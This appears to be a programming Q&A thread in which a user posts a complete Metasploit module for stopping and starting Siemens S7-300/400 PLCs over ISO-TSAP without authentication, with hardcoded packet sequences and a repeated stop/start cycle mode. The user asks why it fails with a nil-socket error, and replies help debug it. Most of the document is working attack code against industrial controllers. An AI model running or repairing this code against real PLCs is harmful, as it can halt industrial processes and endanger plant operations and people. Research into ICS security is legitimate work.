# getting noMethodError while running exploit in metasploit

Tags: ruby, nomethoderror, metasploit

for my research I am using the following code in Metasploit:

```
require 'msf/core'

class MetasploitModule < Msf::Auxiliary

    include Msf::Exploit::Remote::Tcp
    include Rex::Socket::Tcp
    include Msf::Auxiliary::Scanner

    def initialize(info = {})
        super(update_info(info,
          'Name'=> 'Siemens Simatic S7-300/400 CPU START/STOP Module',
          'Description'   => %q{
                The Siemens Simatic S7-300/400 S7 CPU start and stop functions over ISO-TSAP
                this modules allows an attacker to perform administrative commands without authentication.
                This module allows a remote user to change the state of the PLC between
                STOP and START, allowing an attacker to end process control by the PLC.
            },
          'Author'          => 'Dillon Beresford',
          'License'                 => MSF_LICENSE,
          'References'     =>
                [
                    [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-186-01.pdf' ],
                    [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-161-01.pdf' ],
                ],
            'Version'        => '$Revision$',
          'DisclosureDate' => 'May 09 2011'
          ))

          register_options(
              [
                  Opt::RPORT(102),
                  OptInt.new('MODE', [false, 'Set true to put the CPU back into RUN mode.',false]),
                  OptInt.new('CYCLES',[true,"Set the amount of CPU STOP/RUN cycles.",10])
            ], self.class)
        end

    def run_host(ip)
        begin

        cpu = datastore['MODE'] || ''
        cycles = datastore['CYCLES'] || ''

        stop_cpu_pkt = 
          [
                       "\x03\x00\x00\x16\x11\xe0\x00\x00"+ 
                       "\x00\x01\x00\xc1\x02\x01\x00\xc2"+ 
                   "\x02\x01\x02\xc0\x01\x09",

                "\x03\x00\x00\x19\x02\xf0\x80\x32"+ 
                "\x01\x00\x00\xff\xff\x00\x08\x00"+ 
                "\x00\xf0\x00\x00\x01\x00\x01\x03"+ 
                "\xc0",

                "\x03\x00\x00\x1f\x02\xf0\x80\x32"+ 
                "\x01\x00\x00\x00\x00\x00\x0e\x00"+ 
                "\x00\x04\x01\x12\x0a\x10\x02\x00"+ 
                "\x40\x00\x01\x84\x00\x00\x00",

                "\x03\x00\x00\x1f\x02\xf0\x80\x32"+ 
                "\x01\x00\x00\x00\x01\x00\x0e\x00"+ 
                "\x00\x04\x01\x12\x0a\x10\x02\x00"+ 
                "\x10\x00\x00\x83\x00\x00\x00",

                "\x03\x00\x00\x21\x02\xf0\x80\x32"+
                "\x01\x00\x00\x00\x02\x00\x10\x00"+ 
                "\x00\x29\x00\x00\x00\x00\x00\x09"+ 
                "\x50\x5f\x50\x52\x4f\x47\x52\x41"+ 
                "\x4d",

                "\x03\x00\x00\x1f\x02\xf0\x80\x32"+ 
                "\x01\x00\x00\x00\x01\x00\x0e\x00"+ 
                "\x00\x04\x01\x12\x0a\x10\x02\x00"+ 
                "\x10\x00\x00\x83\x00\x00\x00",

                "\x03\x00\x00\x1f\x02\xf0\x80\x32"+ 
                "\x01\x00\x00\x00\x01\x00\x0e\x00"+ 
                "\x00\x04\x01\x12\x0a\x10\x02\x00"+ 
                "\x10\x00\x00\x83\x00\x00\x00",

                "\x03\x00\x00\x1f\x02\xf0\x80\x32"+ 
                "\x01\x00\x00\x00\x01\x00\x0e\x00"+ 
                "\x00\x04\x01\x12\x0a\x10\x02\x00"+ 
                "\x10\x00\x00\x83\x00\x00\x00",

                "\x03\x00\x00\x1f\x02\xf0\x80\x32"+ 
                "\x01\x00\x00\x00\x01\x00\x0e\x00"+ 
                "\x00\x04\x01\x12\x0a\x10\x02\x00"+ 
                "\x10\x00\x00\x83\x00\x00\x00",

                "\x03\x00\x00\x1f\x02\xf0\x80\x32"+ 
                "\x01\x00\x00\x00\x01\x00\x0e\x00"+ 
                "\x00\x04\x01\x12\x0a\x10\x02\x00"+ 
                "\x10\x00\x00\x83\x00\x00\x00",

                "\x03\x00\x00\x1f\x02\xf0\x80\x32"+ 
                "\x01\x00\x00\x00\x01\x00\x0e\x00"+ 
                "\x00\x04\x01\x12\x0a\x10\x02\x00"+ 
                "\x10\x00\x00\x83\x00\x00\x00",

                "\x03\x00\x00\x1f\x02\xf0\x80\x32"+ 
                "\x01\x00\x00\x00\x01\x00\x0e\x00"+ 
                "\x00\x04\x01\x12\x0a\x10\x02\x00"+ 
                "\x10\x00\x00\x83\x00\x00\x00",

                "\x03\x00\x00\x1f\x02\xf0\x80\x32"+ 
                "\x01\x00\x00\x00\x01\x00\x0e\x00"+ 
                "\x00\x04\x01\x12\x0a\x10\x02\x00"+ 
                "\x10\x00\x00\x83\x00\x00\x00"
          ]

        start_cpu_pkt = 
          [
                    "\x03\x00\x00\x16\x11\xe0\x00\x00"+ 
                "\x00\x01\x00\xc1\x02\x01\x00\xc2"+ 
                "\x02\x01\x02\xc0\x01\x09",

                "\x03\x00\x00\x19\x02\xf0\x80\x32"+ 
                "\x01\x00\x00\xff\xff\x00\x08\x00"+ 
                "\x00\xf0\x00\x00\x01\x00\x01\x03"+ 
                "\xc0",

                "\x03\x00\x00\x1f\x02\xf0\x80\x32"+ 
                "\x01\x00\x00\x00\x00\x00\x0e\x00"+ 
                "\x00\x04\x01\x12\x0a\x10\x02\x00"+ 
                "\x40\x00\x01\x84\x00\x00\x00",

                "\x03\x00\x00\x1f\x02\xf0\x80\x32"+ 
                "\x01\x00\x00\x00\x01\x00\x0e\x00"+ 
                "\x00\x04\x01\x12\x0a\x10\x02\x00"+ 
                "\x10\x00\x00\x83\x00\x00\x00",


                "\x03\x00\x00\x25\x02\xf0\x80\x32"+  
                "\x01\x00\x00\x00\x02\x00\x14\x00"+ 
                "\x00\x28\x00\x00\x00\x00\x00\x00"+ 
                "\xfd\x00\x00\x09\x50\x5f\x50\x52"+
                "\x4f\x47\x52\x41\x4d"

                ]
        # CPU STOP      
        if(cpu == 1)
        connect()
        stop_cpu_pkt.each do |i|
          sock.put("#{i}")
          sleep(0.005)
          end
      end
      # CPU START
      if(cpu == 2)
        connect()
        start_cpu_pkt.each do |i|
          sock.put("#{i}")
          sleep(0.005)
          end
      end
    # STOP / START CPU 
    for n in 0..cycles
      if(cpu == 3)
        connect()
        # We assume PLC is up and running (issue a stop command)
        stop_cpu_pkt.each do |i|  
          sock.put("#{i}")
          sleep(0.005)
        end

        connect()
        # We assume PLC is has been stopped (issue a start command)
      start_cpu_pkt.each do |i|
        sock.put("#{i}")
          sleep(0.005)
          end
      end
  end

    data = sock.get_once()  
        print_good("#{ip} PLC is running, iso-tsap port is open.")
    if(cpu == 'true')
        print_status("Putting the PLC into START mode.")
            elsif(cpu == 'false')
                print_status("Putting the PLC into STOP mode.")
            end
            disconnect()
            rescue ::EOFError
        end
    end
end
```

When running this exploit in Metasploit I can change all options.
When I try to run I get the following error: `Auxiliary failed: NoMethodError undefined method 'get_once' for nil:NilClass` (see [Metasploit_error](https://i.stack.imgur.com/oVEhx.png))

I did not write this code, and I am unfortunately not familiar with the Ruby language. 
I hope you can help me fix this!

Comment: Hard to say, but 'sock' is null, maybe you can check that the socket port is correct

Comment: I scanned the ports and it gives me that port 102 is open

Comment: aren't you missing an initialization step?

Answer (score 0):

Apparently the `sock` object is null, that is why it cannot call the method `get_once()`

To debug it, you can try:

**Note**: This will not fix the problem.

```
data = ""
if not sock.nil? then 
  data = sock.get_once()
  print_good("#{ip} PLC is running, iso-tsap port is open.")
else
  print_good("#{ip} PLC is not running, iso-tsap port is closed.")
end
```

However the question remains. Where `sock` is initialized?

Comment: Thanks for answering, I debugged and it gives me the following: 192.168.0.4:102        - 192.168.0.4 PLC is not running, iso-tsap port is closed. Is there anything else I can try? how can I initialize the sock?

Comment: I think I found something of use: https://github.com/rapid7/metasploit-framework/wiki/How-to-use-the-Msf::Exploit::Remote::Tcp-mixin